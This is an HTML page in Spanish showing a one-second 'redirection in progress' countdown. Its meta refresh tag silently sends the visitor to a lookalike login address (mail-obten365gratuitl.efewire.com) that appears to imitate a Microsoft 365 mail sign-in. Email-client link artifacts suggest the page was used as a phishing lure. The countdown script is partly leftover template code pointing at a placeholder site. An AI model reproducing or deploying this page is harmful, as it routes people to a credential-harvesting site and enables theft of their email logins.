<!DOCTYPE html>
<html>
<head>
  <title>Redirección</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="refresh" content="1; URL=https://www.mail-obten365gratuitl.efewire.com/login/login.html" />
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
      text-align: center;
    }
    .contenedor {
      width: 80%;
      margin: 40px auto;
      padding: 20px;
      background-color: #fff;
      border-radius: 10px;
      box-shadow: 0px 0px 10px rgba(0,0,0,0.1);
    }
    .titulo {
      font-size: 24px;
      font-weight: bold;
      margin-bottom: 10px;
    }
    .contador {
      font-size: 48px;
      font-weight: bold;
      color: #666;
    }
    .mensaje {
      font-size: 18px;
      color: #999;
    }
    .imagen-lafise {
      width: 100%;
      height: auto;
      margin-bottom: 20px;
    }
  </style>
</head>
<body>
 <div class="contenedor"><a id="OWAff279e5c-a054-edc1-0ba7-d8353f0a2f68" class="OWAAutoLink" href="" data-auth="NotApplicable"><img src="https://cdn.dribbble.com/userupload/22072663/file/original-bec386ea13e88d5e6b421dedd28f09e8.gif" width="260" data-imagetype="External" /></a><br />
    <h1 class="titulo">Redirección en curso...</h1>
    <p class="mensaje">Te redirigiré a la otra página en <span id="contador" class="contador">1</span> segundo.</p>
    <div style="height:20px;"></div>
    <p class="mensaje">Por favor, espere...</p>
  </div>

  <script>
    let contador = 1;
    const intervalo = setInterval(() => {
      document.getElementById("contador").innerHTML = contador.toString();
      contador--;
      if (contador === -1) {
        clearInterval(intervalo);
        window.location.href = "https://www.ejemplo.com"; // reemplaza con la URL deseada
        document.querySelector(".contenedor").style.display = "none";
        document.body.style.backgroundImage = "none";
        document.body.style.backgroundColor = "#fff";
        setTimeout(function(){
          window.location.href=window.location.href; 
          },100); 
       } else if (contador === -5) {  
         clearInterval(intervalo);
         window.location.href=window.location.href; 
       }  
     },1000); // se ejecuta cada segundo
   </script>   
</body>   
</html>    
